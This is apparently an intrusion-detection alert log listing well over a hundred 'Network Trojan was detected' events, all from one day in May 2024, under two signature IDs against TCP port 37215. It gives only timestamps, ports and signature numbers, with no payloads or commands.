            Timestamp:05/28/24-09:57:21.881089
            SID:2829579
            Source Port:34510
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.995179
            SID:2835222
            Source Port:43732
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.542106
            SID:2835222
            Source Port:47988
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754580
            SID:2829579
            Source Port:49282
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956422
            SID:2835222
            Source Port:50772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.910800
            SID:2835222
            Source Port:40890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.857872
            SID:2829579
            Source Port:46840
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.031714
            SID:2829579
            Source Port:49596
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.321786
            SID:2829579
            Source Port:58462
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.855673
            SID:2835222
            Source Port:53842
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:55.680240
            SID:2829579
            Source Port:35454
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.989870
            SID:2835222
            Source Port:46914
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.995888
            SID:2835222
            Source Port:59080
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.876188
            SID:2835222
            Source Port:34356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.780597
            SID:2829579
            Source Port:60732
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.995547
            SID:2829579
            Source Port:34586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.872567
            SID:2835222
            Source Port:39080
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.728363
            SID:2835222
            Source Port:53026
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.899698
            SID:2829579
            Source Port:49424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.737851
            SID:2829579
            Source Port:37430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.102829
            SID:2835222
            Source Port:33552
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.746998
            SID:2829579
            Source Port:37264
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.909148
            SID:2835222
            Source Port:36358
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.578263
            SID:2835222
            Source Port:50568
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.383972
            SID:2835222
            Source Port:54178
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.769395
            SID:2835222
            Source Port:39662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.040249
            SID:2829579
            Source Port:46166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.572571
            SID:2835222
            Source Port:56210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.999806
            SID:2829579
            Source Port:35990
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.615609
            SID:2835222
            Source Port:40434
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.705937
            SID:2829579
            Source Port:33240
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.952641
            SID:2835222
            Source Port:55094
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.766776
            SID:2829579
            Source Port:52078
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.847624
            SID:2829579
            Source Port:47224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.852198
            SID:2835222
            Source Port:52662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.887645
            SID:2829579
            Source Port:60812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:09.969268
            SID:2829579
            Source Port:51374
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:51.665272
            SID:2829579
            Source Port:40908
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.755024
            SID:2835222
            Source Port:37428
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.735672
            SID:2835222
            Source Port:55686
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.987101
            SID:2829579
            Source Port:48558
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.332484
            SID:2835222
            Source Port:48686
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.303747
            SID:2829579
            Source Port:58998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.762315
            SID:2829579
            Source Port:47012
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.892176
            SID:2829579
            Source Port:37630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.040381
            SID:2829579
            Source Port:56136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.845087
            SID:2829579
            Source Port:50960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.066532
            SID:2829579
            Source Port:39704
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.782877
            SID:2829579
            Source Port:45904
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.735629
            SID:2829579
            Source Port:57206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.573403
            SID:2829579
            Source Port:49136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.827628
            SID:2829579
            Source Port:36188
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.998511
            SID:2829579
            Source Port:60862
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994128
            SID:2835222
            Source Port:48294
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.102805
            SID:2835222
            Source Port:57356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.897616
            SID:2829579
            Source Port:42678
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.049294
            SID:2829579
            Source Port:55840
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.764225
            SID:2829579
            Source Port:43798
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.326012
            SID:2835222
            Source Port:38870
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.804794
            SID:2835222
            Source Port:35890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.803957
            SID:2835222
            Source Port:45578
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754715
            SID:2829579
            Source Port:49404
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.900935
            SID:2835222
            Source Port:40538
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.930103
            SID:2835222
            Source Port:49772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.018682
            SID:2829579
            Source Port:35150
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.943521
            SID:2829579
            Source Port:59036
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.056857
            SID:2829579
            Source Port:47006
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.064059
            SID:2829579
            Source Port:34294
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.169940
            SID:2835222
            Source Port:37030
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.026361
            SID:2829579
            Source Port:35674
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809704
            SID:2835222
            Source Port:55392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.730269
            SID:2829579
            Source Port:39128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.435425
            SID:2829579
            Source Port:59866
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.687772
            SID:2829579
            Source Port:46224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.923868
            SID:2829579
            Source Port:54976
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765585
            SID:2835222
            Source Port:55290
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.707562
            SID:2829579
            Source Port:35968
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.061034
            SID:2829579
            Source Port:52800
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:04.899542
            SID:2835222
            Source Port:45280
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.926151
            SID:2835222
            Source Port:36664
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.753695
            SID:2835222
            Source Port:50050
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.837116
            SID:2835222
            Source Port:44330
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.065773
            SID:2829579
            Source Port:54062
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.840597
            SID:2835222
            Source Port:54960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.875786
            SID:2835222
            Source Port:56790
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.988741
            SID:2829579
            Source Port:47028
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.280384
            SID:2829579
            Source Port:52272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.650806
            SID:2835222
            Source Port:48712
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.855520
            SID:2835222
            Source Port:46332
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.953474
            SID:2835222
            Source Port:56950
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.052457
            SID:2835222
            Source Port:36942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.654663
            SID:2829579
            Source Port:45846
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:32.414268
            SID:2829579
            Source Port:46172
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.072152
            SID:2829579
            Source Port:45342
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.537253
            SID:2829579
            Source Port:36754
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.863684
            SID:2829579
            Source Port:47486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.701933
            SID:2829579
            Source Port:32918
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.870447
            SID:2835222
            Source Port:58606
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.996152
            SID:2835222
            Source Port:40664
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.343747
            SID:2829579
            Source Port:46342
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.841112
            SID:2835222
            Source Port:56994
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.505776
            SID:2829579
            Source Port:43430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.810221
            SID:2829579
            Source Port:34240
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.667719
            SID:2829579
            Source Port:47814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.929902
            SID:2829579
            Source Port:50618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.057865
            SID:2829579
            Source Port:46652
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.323187
            SID:2829579
            Source Port:46726
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.882709
            SID:2829579
            Source Port:51822
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.900091
            SID:2835222
            Source Port:54552
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.979456
            SID:2829579
            Source Port:45304
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.850679
            SID:2835222
            Source Port:47496
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.745607
            SID:2829579
            Source Port:42760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.770834
            SID:2829579
            Source Port:47062
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.646738
            SID:2829579
            Source Port:54288
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.605539
            SID:2835222
            Source Port:39998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.753387
            SID:2835222
            Source Port:49924
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.927064
            SID:2829579
            Source Port:47974
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.618079
            SID:2835222
            Source Port:38724
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.953611
            SID:2829579
            Source Port:43686
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.048018
            SID:2835222
            Source Port:35874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:19.875128
            SID:2835222
            Source Port:43388
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.276489
            SID:2829579
            Source Port:59060
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.327373
            SID:2835222
            Source Port:52280
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.556611
            SID:2829579
            Source Port:54660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.470311
            SID:2835222
            Source Port:41228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:33.385489
            SID:2835222
            Source Port:56642
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.825921
            SID:2835222
            Source Port:49948
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.793735
            SID:2829579
            Source Port:53398
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.899847
            SID:2835222
            Source Port:56044
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.231016
            SID:2835222
            Source Port:48514
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:55.685156
            SID:2835222
            Source Port:35976
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.290792
            SID:2835222
            Source Port:39136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.669747
            SID:2835222
            Source Port:48706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.520205
            SID:2829579
            Source Port:45814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.320370
            SID:2835222
            Source Port:50858
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.808387
            SID:2829579
            Source Port:43186
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.891652
            SID:2835222
            Source Port:42718
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.065194
            SID:2835222
            Source Port:50646
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.999183
            SID:2829579
            Source Port:60524
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.343615
            SID:2835222
            Source Port:44176
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.058745
            SID:2835222
            Source Port:56544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.260908
            SID:2835222
            Source Port:47322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936963
            SID:2829579
            Source Port:35302
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.927540
            SID:2829579
            Source Port:40946
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.304125
            SID:2835222
            Source Port:36984
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.850996
            SID:2829579
            Source Port:43260
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.543990
            SID:2829579
            Source Port:56176
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.410725
            SID:2829579
            Source Port:47482
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.952540
            SID:2835222
            Source Port:46416
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.887409
            SID:2835222
            Source Port:51118
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.261274
            SID:2829579
            Source Port:38666
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.541838
            SID:2835222
            Source Port:55586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.734921
            SID:2829579
            Source Port:33648
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.059689
            SID:2829579
            Source Port:34144
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.687510
            SID:2829579
            Source Port:33558
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.634281
            SID:2829579
            Source Port:58128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.843745
            SID:2835222
            Source Port:34680
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.066407
            SID:2829579
            Source Port:50642
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.579227
            SID:2835222
            Source Port:33100
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776719
            SID:2829579
            Source Port:35986
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.499747
            SID:2829579
            Source Port:46818
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.854377
            SID:2835222
            Source Port:46394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.042571
            SID:2835222
            Source Port:37994
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.930165
            SID:2829579
            Source Port:33380
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.302203
            SID:2829579
            Source Port:34152
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.770767
            SID:2829579
            Source Port:47248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.735435
            SID:2829579
            Source Port:60238
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.912172
            SID:2835222
            Source Port:59096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.930093
            SID:2835222
            Source Port:46674
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.372482
            SID:2835222
            Source Port:36898
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.560187
            SID:2829579
            Source Port:44738
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.855231
            SID:2829579
            Source Port:47018
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.911217
            SID:2835222
            Source Port:35204
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.706735
            SID:2829579
            Source Port:38854
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.840887
            SID:2835222
            Source Port:52418
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.926686
            SID:2829579
            Source Port:43200
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.276658
            SID:2829579
            Source Port:58890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.717910
            SID:2835222
            Source Port:40752
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.851255
            SID:2835222
            Source Port:34758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.263134
            SID:2829579
            Source Port:40002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.020548
            SID:2835222
            Source Port:39532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.436488
            SID:2835222
            Source Port:45734
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:37.443145
            SID:2829579
            Source Port:44414
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.771739
            SID:2829579
            Source Port:41262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.068885
            SID:2835222
            Source Port:50640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.996128
            SID:2835222
            Source Port:37432
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.313244
            SID:2829579
            Source Port:46046
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.741637
            SID:2835222
            Source Port:54552
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.086322
            SID:2835222
            Source Port:44028
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.963545
            SID:2829579
            Source Port:56758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.812010
            SID:2829579
            Source Port:47112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.954671
            SID:2829579
            Source Port:54726
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.065551
            SID:2835222
            Source Port:34972
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.861813
            SID:2835222
            Source Port:39076
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.847011
            SID:2835222
            Source Port:42800
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:34.432597
            SID:2835222
            Source Port:56784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.931781
            SID:2835222
            Source Port:34116
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.187349
